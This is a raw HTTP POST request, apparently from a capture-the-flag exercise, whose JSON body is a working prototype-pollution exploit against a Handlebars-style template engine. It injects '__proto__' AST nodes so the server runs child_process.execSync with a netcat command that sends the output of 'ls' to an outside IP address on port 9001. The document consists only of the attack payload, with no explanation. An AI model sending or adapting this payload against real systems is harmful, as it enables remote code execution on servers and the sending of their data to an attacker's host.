POST /api/submit HTTP/1.1
Host: 167.172.49.117:30461
Content-Length: 405
Content-Type: application/json

{"artist.name":"Westaway",
  "__proto__.type": "Program",
    "__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync(`nc 180.150.36.166 9001 -e ls`)"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
}
